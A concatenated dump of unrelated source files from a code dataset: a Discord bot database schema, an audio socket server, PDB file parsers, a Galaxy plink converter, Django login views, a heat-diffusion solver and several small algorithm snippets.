REFERENCES guilds (id)\n ON DELETE CASCADE\n )\"\"\"\n\n sbemoijs_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS sbemojis (\n id SERIAL PRIMARY KEY,\n d_id numeric,\n starboard_id numeric NOT NULL,\n\n name text NOT NULL,\n 
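# ---- editor's note (illustrative sketch, not part of the original record) ----
# The CommonSql class above wraps asyncpg prepared statements. Once prepared, a
# statement is invoked with positional arguments matching its $1..$n placeholders.
# Connection parameters mirror make_connection() above; the password is a placeholder.
import asyncio
import asyncpg

async def demo():
    conn = await asyncpg.connect(host='localhost', database='starboard',
                                 user='starboard', password='...')
    stmt = await conn.prepare("INSERT INTO guilds (id) VALUES($1)")
    await stmt.fetch(123456789)   # $1 -> 123456789
    await conn.close()

# asyncio.run(demo())
# ---- end editor's note ----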
is_downvote bool NOT NULL DEFAULT false,\n\n FOREIGN KEY (starboard_id) REFERENCES starboards (id)\n ON DELETE CASCADE\n )\"\"\"\n\n aschannels_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS aschannels (\n id numeric PRIMARY KEY,\n guild_id numeric NOT NULL,\n\n min_chars int NOT NULL DEFAULT 0,\n require_image bool NOT NULL DEFAULT False,\n delete_invalid bool NOT NULL DEFAULT False\n )\"\"\"\n\n asemojis_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS asemojis (\n id SERIAL PRIMARY KEY,\n aschannel_id numeric NOT NULL,\n\n name text NOT NULL,\n\n FOREIGN KEY (aschannel_id) REFERENCES aschannels (id)\n ON DELETE CASCADE\n )\"\"\"\n\n messages_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS messages (\n id numeric PRIMARY KEY,\n guild_id numeric NOT NULL,\n user_id numeric NOT NULL,\n orig_message_id numeric DEFAULT NULL,\n channel_id numeric NOT NULL,\n\n is_orig bool NOT NULL,\n is_nsfw bool NOT NULL,\n is_trashed bool NOT NULL DEFAULT false,\n is_frozen bool NOT NULL DEFAULT false,\n is_forced bool NOT NULL DEFAULT false,\n\n FOREIGN KEY (guild_id) REFERENCES guilds (id)\n ON DELETE CASCADE,\n FOREIGN KEY (user_id) REFERENCES users (id),\n FOREIGN KEY (orig_message_id) REFERENCES messages (id)\n ON DELETE CASCADE\n )\"\"\"\n\n reactions_table = \\\n \"\"\"CREATE TABLE IF NOT EXISTS reactions (\n id SERIAL PRIMARY KEY,\n guild_id numeric NOT NULL,\n user_id numeric NOT NULL,\n message_id numeric NOT NULL,\n\n name text NOT NULL,\n\n FOREIGN KEY (guild_id) REFERENCES guilds (id)\n ON DELETE CASCADE,\n FOREIGN KEY (user_id) REFERENCES users (id)\n ON DELETE CASCADE,\n FOREIGN KEY (message_id) REFERENCES messages (id)\n )\"\"\"\n\n delete_reaction_index = \\\n \"\"\"CREATE INDEX IF NOT EXISTS delete_reaction\n ON reactions(message_id, user_id, name)\"\"\"\n\n await self.lock.acquire()\n await self._create_table(guilds_table)\n await self._create_table(prefixes_table)\n await self._create_table(users_table)\n await self._create_table(patrons_table)\n await self._create_table(votes_table)\n await self._create_table(donations_table)\n await self._create_table(members_table)\n await self._create_table(starboards_table)\n await self._create_table(sbemoijs_table)\n await self._create_table(aschannels_table)\n await self._create_table(asemojis_table)\n await self._create_table(messages_table)\n await self._create_table(reactions_table)\n\n await self._create_index(delete_reaction_index)\n self.lock.release()\n","sub_path":"database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":13116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"208291230","text":"import wave\r\nimport pyaudio\r\nfrom socket import *\r\nimport sys\r\nfrom select import *\r\n\r\nCHUNK = 1024\r\nFORMAT = pyaudio.paInt16\r\nCHANNELS = 1\r\nRATE = 16000\r\nWAVE_OUTPUT_FILE = \"server_out.wav\"\r\nWIDTH = 2\r\nframes = []\r\n\r\n# SOCKET setting\r\nHOST = ''\r\nPORT = 10001\r\nBUFSIZE = 1024\r\nADDR = (HOST, PORT)\r\n\r\np = pyaudio.PyAudio()\r\nstream = p.open(format = p.get_format_from_width(WIDTH),\r\n channels = CHANNELS,\r\n rate = RATE,\r\n output = True,\r\n frames_per_buffer = CHUNK)\r\n\r\nserverSocket = socket(AF_INET, SOCK_STREAM)\r\nserverSocket.bind(ADDR)\r\n\r\nprint(\"Server start\")\r\nserverSocket.listen(1)\r\nclientSocket, client_addr = serverSocket.accept()\r\nprint('connected by', client_addr)\r\n\r\ndata = clientSocket.recv(CHUNK)\r\n\r\ni = 1\r\nprint('data receive')\r\nwhile data != '':\r\n stream.write(data)\r\n\r\n try:\r\n data = 
clientSocket.recv(CHUNK)\r\n        #print('%d receive' %len(data))\r\n    except Exception as e:\r\n        print(e)\r\n        clientSocket.close()\r\n        break\r\n    \r\n    if i % (int(RATE/1024*4*WIDTH)) == 0 :\r\n        print( str(i/(int(RATE/1024))) +"sec")\r\n        \r\n        try:\r\n            print("wave open")\r\n            wf = wave.open("./wav/%03d_sec.wav"%((i/(int(RATE/1024)))),'wb')\r\n            wf.setnchannels(CHANNELS)\r\n            wf.setsampwidth(p.get_sample_size(FORMAT))\r\n            wf.setframerate(RATE)\r\n            wf.writeframes(b''.join(frames))\r\n            print("wave closed")\r\n            wf.close()\r\n            # clientSocket.send("that is %d frames"%(i))\r\n            frames =[]\r\n        except Exception as e:\r\n            print(e)\r\n            clientSocket.close()\r\n    i= i+1\r\n    frames.append(data)\r\n\r\nwf = wave.open(WAVE_OUTPUT_FILE,'wb')\r\nwf.setnchannels(CHANNELS)\r\nwf.setsampwidth(p.get_sample_size(FORMAT))\r\nwf.setframerate(RATE)\r\nwf.writeframes(b''.join(frames))\r\nwf.close()\r\n\r\nstream.stop_stream()\r\nstream.close()\r\np.terminate()\r\nclientSocket.close() # close the socket\r\nserverSocket.close()\r\n\r\nprint('close')\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}{"seq_id":"69297451","text":"# -*-coding:utf-8-*-\n# AUTHOR:tyltr\n# TIME :2018/10/24\nimport struct\n\n\ndef aqurt(n):\n    # fast inverse square root: reinterpret the float bits as an int,\n    # apply the 0x5f3759df magic constant, then one Newton-Raphson step\n    i = struct.unpack('<i', struct.pack('<f', n))[0]\n    i = 0x5f3759df - (i >> 1)\n    y = struct.unpack('<f', struct.pack('<i', i))[0]\n    y = y*(1.5 - 0.5*n*y*y)\n    return y\n\nif __name__ == '__main__':\n    print(aqurt(4))  # ~0.5, i.e. 1/sqrt(4)\n","sub_path":"Algorithms/squrt.py","file_name":"squrt.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}{"seq_id":"237948700","text":"def get_clusters():\n    result,result2,result3 =[],[],[]\n    for i in open('out','r'):\n        #print i\n        if 'ZZZ' in i:\n            if i[-1] == '\\n':\n                i = i[0:-1]\n            result += [ int(i.split('ZZZ')[1].split('(')[0]),]\n            if result[-1] > 35:\n                if result[-1] < 1000:\n                    #print i.split('|')[0][-4:],i.split('Chain(s): ')[1].split(';')[0].strip()\n                    result2 += [i.split('ZZZ')[1].split(')')[1].split(','),]\n\n    temp = {}\n    for i in result2:\n        for j in i:\n            pdb, chain = j.strip().split('|')[0].lower(),j.strip().split('|')[2]\n            if j[1:5] not in temp:\n                temp[j[1:5]] = [pdb+'_'+chain.lower(),]\n            else:\n                temp[j[1:5]] += [pdb+'_'+chain.lower(),]\n\n    import pandas as pd\n    rsln_data = pd.read_csv('resln.csv')\n    pdb_map_rsn = {}\n    for i in range(len(rsln_data)):\n        if 'NMR' in rsln_data.iloc[i]['Exp. Method']:\n            temp2 = rsln_data.set_value(i,'Resolution',20)\n        pdb_map_rsn[rsln_data.iloc[i]['PDB ID']] = (round(rsln_data.iloc[i]['Resolution'],1),\\\n                                                    rsln_data.iloc[i]['Exp. 
Method'])\n result2_resln = []\n for group in result2:\n temp2 = []\n for j in group:\n pdb = j.strip().split('|')[0]\n temp2 += [pdb_map_rsn[pdb.upper()] + (j,),]\n result2_resln += [temp2,]\n for i in result2_resln:\n None#print sorted(i)[0:5]\n return result2_resln,result,result2,result3,temp\n#result2_resln,result,result2,result3,temp = get_clusters()\nimport numpy as np\ndef get_pdb_seq(ii):\n f1 = open(ii.lower()+'.pdb','r')\n #full_seq0 = pdb_seq_chain[ii]\n # get c4i #\n first_resi = True\n cord = {}\n prev_resi, curr_resi = 0, 0\n temp = ''\n for line in f1:\n if 'ATOM' in line and line[12:16].strip() == \"P\" :\n #print line\n if line[17:20].strip() in ['A','U','G','C']:\n if first_resi is True :\n first_resi = int(line[22:26].strip()) -1\n #print line\n resNum,resiType = (int(line[22:26].strip())- first_resi,line[17:20].strip())\n X = np.array(float(line[30:38].strip()))\n Y = np.array(float(line[38:46].strip()))\n Z = np.array(float(line[46:54].strip()))\n cord[resNum] = [resiType,np.array([X,Y,Z])]\n else: None#print line[17:20].strip()\n Resi_map = {}\n pdb_seq0 = ''\n for i in range(1,1+max(cord.keys())):\n if i in cord.keys():\n pdb_seq0 += cord[i][0]\n else:\n pdb_seq0 += 'X'\n return pdb_seq0\npdb_seq_chain = np.load('fasta_chain_TEST.npy').item()\ndef get_cif( ii ='1b23_r',pdb_seq=False,format='cif'):\n chain = ii[5:].lower()\n #print chain\n f1 = open('../cif/'+ii.lower()[0:4]+'.cif','r')\n if pdb_seq is False:\n full_seq0 = pdb_seq_chain[ii]\n else:\n full_seq0 = pdb_seq\n # get c4i #\n first_resi = True\n cord = {}\n prev_resi, curr_resi = 0, 0\n temp = ''\n if format =='cif':\n for line in f1:\n if 'ATOM' in line and len(line.split())>=19 :#'\"C1\\'\"' \\\n if line.split()[5] in ['A','U','G','C'] and line.split()[-2] == 'P'\\\n and line.split()[-3].upper() == chain.upper():\n #print line.split()\n if first_resi is True :\n first_resi = int(line.split()[8]) -1\n #print line\n resNum,resiType = (int(line.split()[8])- first_resi,line.split()[5])\n X = np.array(float(line.split()[10]))\n Y = np.array(float(line.split()[11]))\n Z = np.array(float(line.split()[12]))\n cord[(line.split()[-3].lower(),resNum)] = [resiType,np.array([X,Y,Z])]\n elif format == 'pdb':\n f1 = open('./'+ii.lower()[0:4]+'_2.pdb','r')\n for line in f1:\n if 'ATOM' in line and line[17:20].strip() in ['A','U','G','C'] and line[12:16].strip() == 'P'\\\n and line[21].upper() == chain.upper():\n if first_resi is True :\n first_resi = int(line[22:26].strip()) -1\n #print line\n resNum,resiType = (int(line[22:26].strip())- first_resi,line[17:20].strip())\n X = np.array(float(line[30:38].strip()))\n Y = np.array(float(line[38:46].strip()))\n Z = np.array(float(line[46:54].strip()))\n cord[(line[21].lower(),resNum)] = [resiType,np.array([X,Y,Z])] \n \n Resi_map = {}\n pdb_seq0 = ''\n chain_resi = []\n cord_chain ={}\n for i in sorted(cord.keys()):\n if i[0] == chain:\n chain_resi += [i,]\n cord_chain[i] = cord[i]\n for i in range(1,1+max(chain_resi)[1]):\n if (chain,i) in cord.keys():\n pdb_seq0 += cord[(chain,i)][0]\n else:\n pdb_seq0 += 'X'\n return pdb_seq0, full_seq0, cord_chain\n\ndef get_cif_entirePDB( ii ='1b23_r'):\n chain = ii[5:].lower()\n #print chain\n f1 = open('../cif/'+ii.lower()[0:4]+'.cif','r')\n full_seq0 = pdb_seq_chain[ii]\n # get c4i #\n first_resi = True\n cord = {}\n prev_resi, curr_resi = 0, 0\n temp = ''\n for line in f1:\n if 'ATOM' in line and len(line.split())>=19 :#'\"C1\\'\"' \\\n if line.split()[-3].upper() == chain.upper():\n #print line.split()\n if first_resi is True :\n 
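# ---- editor's note (illustrative sketch, not part of the original record) ----
# get_pdb_seq() above relies on the fixed-column PDB ATOM record layout:
# atom name in columns 13-16, residue name in 18-20, residue number in 23-26, and
# x/y/z coordinates in 31-38, 39-46, 47-54 (1-based), hence the 0-based slices used
# there. The ATOM line below is a fabricated example, for illustration only.
line = "ATOM      1  P     G A   1      11.100  22.200  33.300  1.00  0.00"
atom_name = line[12:16].strip()                     # 'P', as tested in the code above
resi_type = line[17:20].strip()                     # 'G'
res_num = int(line[22:26].strip())                  # 1
xyz = [float(line[i:i + 8]) for i in (30, 38, 46)]  # [11.1, 22.2, 33.3]
print(atom_name, resi_type, res_num, xyz)
# ---- end editor's note ----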
first_resi = int(line.split()[8]) -1\n #print line\n resNum,resiType = (int(line.split()[8])- first_resi,line.split()[5])\n X = np.array(float(line.split()[10]))\n Y = np.array(float(line.split()[11]))\n Z = np.array(float(line.split()[12]))\n cord[(line.split()[-3].lower(),resNum,line.split()[-2].strip('\"'))] = [resiType,np.array([X,Y,Z])]\n\n Resi_map = {}\n pdb_seq0 = ''\n chain_resi = []\n cord_chain ={}\n\n return cord\n\n#get_cif_entirePDB('2zjr_y')\n\n\n","sub_path":"feature_generation/test/_get_impt_pdb_new_resln_module.py","file_name":"_get_impt_pdb_new_resln_module.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"620868075","text":"# converter for ldreduced rgenetics datatype\n# used for grr and eigenstrat - shellfish if we get around to it\nfrom __future__ import print_function\n\nimport os\nimport subprocess\nimport sys\nimport tempfile\nimport time\n\nprog = \"pbed_ldreduced_converter.py\"\n\ngalhtmlprefix = \"\"\"\n\n\n\n\n\n\n\n\n\n
\n\"\"\"\n\nplinke = 'plink'\n\n\ndef timenow():\n \"\"\"return current time as a string\n \"\"\"\n return time.strftime('%d/%m/%Y %H:%M:%S', time.localtime(time.time()))\n\n\ndef pruneLD(plinktasks=[], cd='./', vclbase=[]):\n \"\"\"\n \"\"\"\n fplog, plog = tempfile.mkstemp()\n alog = []\n alog.append('## Rgenetics: http://rgenetics.org Galaxy Tools rgQC.py Plink pruneLD runner\\n')\n for task in plinktasks: # each is a list\n vcl = vclbase + task\n with open(plog, 'w') as sto:\n subprocess.check_call(vcl, stdout=sto, stderr=sto, cwd=cd)\n try:\n lplog = open(plog, 'r').readlines()\n lplog = [elem for elem in lplog if elem.find('Pruning SNP') == -1]\n alog += lplog\n alog.append('\\n')\n os.unlink(plog) # no longer needed\n except Exception:\n alog.append('### %s Strange - no std out from plink when running command line\\n%s\\n' % (timenow(), ' '.join(vcl)))\n return alog\n\n\ndef makeLDreduced(basename, infpath=None, outfpath=None, plinke='plink', forcerebuild=False, returnFname=False,\n winsize=\"60\", winmove=\"40\", r2thresh=\"0.1\"):\n \"\"\" not there so make and leave in output dir for post job hook to copy back into input extra files path for next time\n \"\"\"\n outbase = os.path.join(outfpath, basename)\n inbase = os.path.join(infpath)\n plinktasks = []\n vclbase = [plinke, '--noweb']\n plinktasks += [['--bfile', inbase, '--indep-pairwise %s %s %s' % (winsize, winmove, r2thresh), '--out %s' % outbase],\n ['--bfile', inbase, '--extract %s.prune.in --make-bed --out %s' % (outbase, outbase)]]\n vclbase = [plinke, '--noweb']\n pruneLD(plinktasks=plinktasks, cd=outfpath, vclbase=vclbase)\n\n\ndef main():\n \"\"\"\n need to work with rgenetics composite datatypes\n so in and out are html files with data in extrafiles path\n\n .. raw:: xml\n\n \n python '$__tool_directory__/pbed_ldreduced_converter.py' '$input1.extra_files_path/$input1.metadata.base_name' '$winsize' '$winmove' '$r2thresh'\n '$output1' '$output1.files_path' 'plink'\n \n \"\"\"\n nparm = 7\n if len(sys.argv) < nparm:\n sys.stderr.write('## %s called with %s - needs %d parameters \\n' % (prog, sys.argv, nparm))\n sys.exit(1)\n inpedfilepath = sys.argv[1]\n base_name = os.path.split(inpedfilepath)[-1]\n winsize = sys.argv[2]\n winmove = sys.argv[3]\n r2thresh = sys.argv[4]\n outhtmlname = sys.argv[5]\n outfilepath = sys.argv[6]\n try:\n os.makedirs(outfilepath)\n except Exception:\n pass\n plink = sys.argv[7]\n makeLDreduced(base_name, infpath=inpedfilepath, outfpath=outfilepath, plinke=plink, forcerebuild=False, returnFname=False,\n winsize=winsize, winmove=winmove, r2thresh=r2thresh)\n flist = os.listdir(outfilepath)\n with open(outhtmlname, 'w') as f:\n f.write(galhtmlprefix % prog)\n s1 = '## Rgenetics: http://rgenetics.org Galaxy Tools %s %s' % (prog, timenow()) # becomes info\n s2 = 'Input %s, winsize=%s, winmove=%s, r2thresh=%s' % (base_name, winsize, winmove, r2thresh)\n print('%s %s' % (s1, s2))\n f.write('
%s\\n%s\\n
    ' % (s1, s2))\n for i, data in enumerate(flist):\n f.write('
  1. %s
  2. \\n' % (os.path.split(data)[-1], os.path.split(data)[-1]))\n f.write(\"
\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"lib/galaxy/datatypes/converters/pbed_ldreduced_converter.py","file_name":"pbed_ldreduced_converter.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"9102232","text":"from typing import List\nclass Solution:\n def rotate(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n n = len(matrix)\n # 水平翻转\n for i in range(n//2):\n for j in range(n):\n matrix[i][j],matrix[n-i-1][j] = matrix[n-i-1][j],matrix[i][j]\n\n # 斜角翻转\n for i in range(n):\n for j in range(i):\n matrix[i][j],matrix[j][i] = matrix[j][i],matrix[i][j]\n print(matrix)\n\ns = Solution()\nmatrix = [\n [1,2,3],\n [4,5,6],\n [7,8,9]\n]\nprint(s.rotate(matrix))","sub_path":"python/general/面试题 0107.py","file_name":"面试题 0107.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"43743418","text":"from django.shortcuts import render_to_response\nfrom django import forms\nfrom People.models import Person\nfrom Quotes.models import Quote\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.models import User, Group\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.template import RequestContext\nfrom django.utils.translation import gettext\nfrom django.utils import translation\nfrom django.contrib.sites.models import Site\nfrom News.models import Story, Announcement\nfrom django.core.cache import cache\nfrom django.views.decorators.cache import cache_control\n\nclass EmailForm(forms.Form):\n title = forms.CharField(max_length=50,\n widget=forms.TextInput(attrs={'size':'50'}))\n sender = forms.EmailField(max_length=30,\n widget=forms.TextInput(attrs={'size':'30'}))\n date = forms.DateTimeField()\n text = forms.CharField(widget=forms.Textarea(\n attrs={'rows':'6','cols':'75'}))\n\ngender_list = (('M', 'Male'), ('F', 'Female' ))\nclass NewUserForm(forms.Form):\n username = forms.CharField(max_length=30)\n password = forms.CharField(max_length=20, widget=forms.PasswordInput())\n first = forms.CharField(max_length=20)\n last = forms.CharField(max_length=20)\n gender = forms.ChoiceField(choices=gender_list)\n email = forms.EmailField(max_length=30)\n\nsiteLanguages = (('en', 'English'), ('de', 'German' ), ('es', 'Spanish'))\nclass LoginForm(forms.Form):\n username = forms.CharField(max_length=30)\n password = forms.CharField(max_length=20, widget=forms.PasswordInput())\n Language = forms.ChoiceField(choices=siteLanguages)\n quotes = forms.BooleanField(required=False)\n\n# Create your views here.\n\ndef contact_view(request):\n eForm = EmailForm()\n return render_to_response('home/contact_form.html', { 'eForm':eForm })\n\n@cache_control(private=True, max_age=600)\ndef home_view(request):\n rDict = {}\n pList = cache.get('PersonList')\n if pList == None:\n pList = Person.objects.all()\n cache.set('PersonList', pList, 600)\n rDict['pList'] = pList\n rDict['announceList'] = Announcement.on_site.all()\n\n currentSite = Site.objects.get_current()\n if (currentSite.domain == 'iFriends.test'):\n hpTemplate = 'home/homepage.html'\n rDict['quotes'] = Quote.objects.all()\n elif (currentSite.domain == 'iNews.test'):\n hpTemplate = 'home/newshomepage.html'\n rDict['storyList'] = Story.on_site.all()\n\n return render_to_response(hpTemplate, rDict,\n 
context_instance = RequestContext(request))\n\n@csrf_exempt\ndef create_user(request):\n class PersonForm(forms.ModelForm):\n class Meta:\n model = Person\n fields = '__all__'\n\n message = 'Create New User'\n uForm = NewUserForm()\n\n if request.method == 'POST':\n if request.POST['submit'] == 'Create':\n postDict = request.POST.copy()\n uForm = NewUserForm(postDict)\n #create User object\n user = User.objects.create_user(postDict['username'],\n postDict['email'],\n postDict['password'])\n user.last_name = postDict['last']\n user.first_name = postDict['first']\n user.groups.add(Group.objects.get(name='iFriends'))\n user.save()\n\n #Create a Person object\n perDict = {}\n perDict['name'] = \"%s %s\" % (postDict['first'], postDict['last'])\n perDict['email'] = postDict['email']\n perDict['gender'] = postDict['gender']\n perDict['favoriteURL'] = 'http://www.iFriends.org'\n perDict['desc'] = 'New User'\n perDict['userID'] = user.id\n pForm = PersonForm(perDict)\n if pForm.is_valid():\n try:\n p = pForm.save()\n return HttpResponseRedirect('/People/Info/%d/' % p.id)\n except:\n message = 'Database Error.'\n user.delete()\n else:\n message = 'Form Data Error'\n user.delete()\n\n return render_to_response('registration/create_user.html',{\n 'uForm': uForm,\n 'message': message })\n\n@csrf_exempt\ndef login_user(request, next= '/'):\n message = gettext('Login User')\n lForm = LoginForm()\n\n if request.method == 'GET':\n request.session.set_test_cookie()\n\n if request.GET.has_key('next'):\n next = request.GET['next']\n\n if request.method == 'POST':\n if request.session.test_cookie_worked():\n request.session.delete_test_cookie()\n\n if request.POST['submit'] == 'Login':\n postDict = request.POST.copy()\n lForm = LoginForm(postDict)\n if lForm.is_valid():\n uName = request.POST['username']\n uPass = request.POST['password']\n user = authenticate(username=uName, password=uPass)\n\n if 'quotes' in request.POST:\n request.session['show_quotes'] = True\n else:\n request.session['show_quotes'] = False\n\n if user is not None:\n if user.is_active:\n login(request, user)\n request.session[translation.LANGUAGE_SESSION_KEY] = request.POST['Language']\n return HttpResponseRedirect(next)\n else:\n message = 'Account Deactivated'\n\n else:\n message = 'Login Incorrect'\n else:\n message = \"Please enable cookies and try again.\"\n\n return render_to_response('registration/login.html',{\n 'lForm': lForm,\n 'message': message })\n\ndef logout_user(request):\n logout(request)\n return HttpResponseRedirect('/Login')\n\n","sub_path":"Home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"608208131","text":"# ----------------------------------------------------------------------------------------\n# assignment.py\n# ----------------------------------------------------------------------------------------\na = b # assignment\n # assignment_lhs_identifier:a\n # assignment_rhs_atom:b\n # single_assignment:a\n # whole_span:1\n\n# ----------------------------------------------------------------------------------------\n# collatz_print.py\n# ----------------------------------------------------------------------------------------\ndef print_collatz(n): # added_block_label (-> +7)\n # function:print_collatz (-> +7)\n # function_argument:n\n # function_argument_flavor:arg\n # function_returning_nothing:print_collatz (-> +7)\n # whole_span:8 (-> +7)\n while n != 1: # comparison_operator:NotEq\n # 
literal:1\n # loop:while (-> +5)\n # loop_with_late_exit:while (-> +5)\n # suggest_constant_definition\n # while (-> +5)\n print(n) # call_argument:n\n # external_free_call:print\n # free_call:print\n # free_call_without_result:print\n if n % 2 == 0: # added_label_on_line_4\n # binary_operator:Mod\n # comparison_operator:Eq\n # divisibility_test:2\n # if (-> +3)\n # if_test_atom:0\n # if_test_atom:2\n # if_test_atom:n\n # literal:0\n # literal:2\n # modulo_operator\n # verbose_conditional_assignment (-> +3)\n n = n // 2 # assignment:FloorDiv\n # assignment_lhs_identifier:n\n # assignment_rhs_atom:2\n # assignment_rhs_atom:n\n # if_then_branch\n # literal:2\n # single_assignment:n\n # suggest_augmented_assignment\n # update:n:2\n # update_by_assignment:n:2\n # update_by_assignment_with:FloorDiv\n # update_with:FloorDiv\n else: # unknown_label\n n = 3 * n + 1 # addition_operator\n # assignment:Add\n # assignment_lhs_identifier:n\n # assignment_rhs_atom:1\n # assignment_rhs_atom:3\n # assignment_rhs_atom:n\n # binary_operator:Add\n # binary_operator:Mult\n # if_else_branch\n # literal:1\n # literal:3\n # multiplication_operator\n # single_assignment:n\n # suggest_constant_definition\n # update:n:1\n # update:n:3\n # update_by_assignment:n:1\n # update_by_assignment:n:3\n # update_by_assignment_with:Add\n # update_with:Add\n print(n) # call_argument:n\n # external_free_call:print\n # free_call:print\n # free_call_without_result:print\n\n# ----------------------------------------------------------------------------------------\n# fizzbuzz.py\n# ----------------------------------------------------------------------------------------\nimport collatz_print # import_internally:collatz_print\n # import_module_internally:collatz_print\n # whole_span:10 (-> +9)\nfor i in range(1, 101): # call_argument:1\n # call_argument:101\n # external_free_call:range\n # for:i (-> +8)\n # for_range:1:101 (-> +8)\n # free_call:range\n # literal:1\n # literal:101\n # loop:for (-> +8)\n # loop_with_late_exit:for (-> +8)\n # range:1:101\n if i % 15 == 0: # binary_operator:Mod\n # comparison_operator:Eq\n # divisibility_test:15\n # if (-> +7)\n # if_test_atom:0\n # if_test_atom:15\n # if_test_atom:i\n # literal:0\n # literal:15\n # modulo_operator\n # suggest_constant_definition\n print(\"FizzBuzz\") # call_argument:\n # external_free_call:print\n # free_call:print\n # free_call_without_result:print\n # if_then_branch\n # literal:Str\n elif i % 3 == 0: # binary_operator:Mod\n # comparison_operator:Eq\n # divisibility_test:3\n # if (-> +5)\n # if_test_atom:0\n # if_test_atom:3\n # if_test_atom:i\n # literal:0\n # literal:3\n # modulo_operator\n # suggest_constant_definition\n print(\"Fizz\") # call_argument:\n # external_free_call:print\n # free_call:print\n # free_call_without_result:print\n # if_elif_branch\n # literal:Str\n elif i % 5 == 0: # binary_operator:Mod\n # comparison_operator:Eq\n # divisibility_test:5\n # if (-> +3)\n # if_test_atom:0\n # if_test_atom:5\n # if_test_atom:i\n # literal:0\n # literal:5\n # modulo_operator\n # suggest_constant_definition\n print(\"Buzz\") # call_argument:\n # external_free_call:print\n # free_call:print\n # free_call_without_result:print\n # if_elif_branch\n # literal:Str\n else: # \n print(i) # call_argument:i\n # external_free_call:print\n # free_call:print\n # free_call_without_result:print\n # if_else_branch\n\n# ----------------------------------------------------------------------------------------\n# is_even.py\n# 
----------------------------------------------------------------------------------------\nimport fizzbuzz # import_internally:fizzbuzz\n # import_module_internally:fizzbuzz\n # whole_span:3 (-> +2)\ndef is_even(n): # function:is_even (-> +1)\n # function_argument:n\n # function_argument_flavor:arg\n # function_returning_something:is_even (-> +1)\n return n % 2 == 0 # binary_operator:Mod\n # comparison_operator:Eq\n # divisibility_test:2\n # literal:0\n # literal:2\n # modulo_operator\n # return\n","sub_path":"tests/snapshots/simple_labelled_sources.py","file_name":"simple_labelled_sources.py","file_ext":"py","file_size_in_byte":7421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"518294354","text":"# Author: Chase Chivers\n# Last updated: 3/18/20\n\nimport numpy as np\nimport time as _timer_\nfrom utility_funcs import *\nimport string, random, os\nfrom scipy import optimize\nfrom scipy.special import erf, erfc\n\nclass HeatSolver:\n\t\"\"\"\n\tSolves two-phase thermal diffusivity problem with a temperature-dependent thermal conductivity of ice in\n\ttwo-dimensions. Sources and sinks include latent heat of fusion and tidal heating\n\tOptions:\n\t\ttidalheat -- binary; turns on/off viscosity-dependent tidal heating from Mitri & Showman (2005), default = 0\n\t\tTtol -- convergence tolerance for temperature, default = 0.1 K\n\t\tphitol -- convergence tolerance for liquid fraction, default = 0.01\n\t\tlatentheat -- 1 : use Huber et al. (2008) enthalpy method (other options coming soon?)\n\t\tfreezestop -- binary; stop when intrusion is frozen, default = 0\n\n\tUsage:\n\t\tAssuming, model = IceSystem(...)\n\t\t- Turn on tidal heating component\n\t\t\tmodel.tidalheat = True\n\n\t\t- Change tolerances\n\t\t\tmodel.Ttol = 0.001\n\t\t\tmodel.phitol = 0.0001\n\t\t\tmodel.Stol = 0.0001\n\t\"\"\"\n\t# off and on options\n\ttidalheat = 0 # off/on tidalheating component\n\tTtol = 0.1 # temperature tolerance\n\tphitol = 0.01 # liquid fraction tolerance\n\tStol = 1 # salinity tolerance\n\tlatentheat = 1 # choose enthalpy method to use\n\tfreezestop = 0 # stop simulation upon total solidification of intrusion\n\tmodel_time = 0\n\n\tclass outputs:\n\t\t\"\"\"Class structure to help define and calculate desired outputs of a simulation.\"\"\"\n\n\t\tdef __init__(self):\n\t\t\tself.outputs.tmp_data_directory = ''\n\t\t\tself.outputs.tmp_data_file_name = ''\n\t\t\tself.outputs.transient_results = dict()\n\t\t\tself.outputs.output_frequency = 0\n\n\t\tdef choose(self, file_path='./tmp/', file_name='', all=False, T=False, phi=False, k=False, S=False, Q=False,\n\t\t h=False, r=False, freeze_fronts=False, percent_frozen=False, output_frequency=1000, output_list=[]):\n\t\t\t\"\"\"\n\t\t\tChoose which outputs to track with time. Each variable is updated at the chosen output frequency and is\n\t\t\treturned in the dictionary object outputs.transient_results.\n\t\t\tParameters:\n\t\t\t\toutput_frequency : integer\n\t\t\t\t\tthe frequency to report a transient result. Default is every 1000 time steps\n\t\t\t\toutput_list : list\n\t\t\t\t\tlist of strings for the outputs below. Generally used for simulation that had stopped (i.e. 
